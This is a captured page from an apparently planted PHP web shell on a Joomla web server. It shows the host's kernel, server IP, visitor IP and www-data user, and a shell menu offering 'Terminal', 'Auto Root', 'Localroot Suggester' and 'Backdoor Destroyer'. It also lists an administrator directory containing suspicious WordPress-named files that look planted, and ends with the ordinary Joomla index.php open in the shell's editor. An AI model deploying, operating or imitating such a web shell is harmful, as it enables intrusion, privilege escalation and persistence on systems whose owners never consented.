Linux mail.vriendennsm.nl 6.1.0-51-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.177-1 (2026-07-16) x86_64
Apache/2.4.68 (Debian)
Server IP : 217.154.75.17 & Your IP : 216.73.216.195
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
vnsm /
administrator /
Delete
Unzip
Name
Size
Permission
Date
Action
cache
[ DIR ]
drwxr-xr-x
2026-08-28 00:53
components
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
help
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
includes
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
language
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
logs
[ DIR ]
drwxr-xr-x
2026-08-23 10:58
manifests
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
modules
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
templates
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
.htaccess
197
B
-r--r--r--
2026-08-21 03:29
index.php
1.49
KB
-rwxr-xr-x
2023-07-08 16:23
wp-blog-header.php
2.74
KB
-r--r--r--
2026-08-21 03:29
wp-cron.php
2.74
KB
-rw-r--r--
2026-08-21 03:29
Save
Rename
<?php /** * @package Joomla.Administrator * * @copyright (C) 2005 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ /** * Define the application's minimum supported PHP version as a constant so it can be referenced within the application. */ define('JOOMLA_MINIMUM_PHP', '5.3.10'); if (version_compare(PHP_VERSION, JOOMLA_MINIMUM_PHP, '<')) { die('Your host needs to use PHP ' . JOOMLA_MINIMUM_PHP . ' or higher to run this version of Joomla!'); } // Saves the start time and memory usage. $startTime = microtime(1); $startMem = memory_get_usage(); /** * Constant that is checked in included files to prevent direct access. * define() is used in the installation folder rather than "const" to not error for PHP 5.2 and lower */ define('_JEXEC', 1); if (file_exists(__DIR__ . '/defines.php')) { include_once __DIR__ . '/defines.php'; } if (!defined('_JDEFINES')) { define('JPATH_BASE', __DIR__); require_once JPATH_BASE . '/includes/defines.php'; } require_once JPATH_BASE . '/includes/framework.php'; require_once JPATH_BASE . '/includes/helper.php'; require_once JPATH_BASE . '/includes/subtoolbar.php'; // Set profiler start time and memory usage and mark afterLoad in the profiler. JDEBUG ? JProfiler::getInstance('Application')->setStart($startTime, $startMem)->mark('afterLoad') : null; // Instantiate the application. $app = JFactory::getApplication('administrator'); // Execute the application. $app->execute();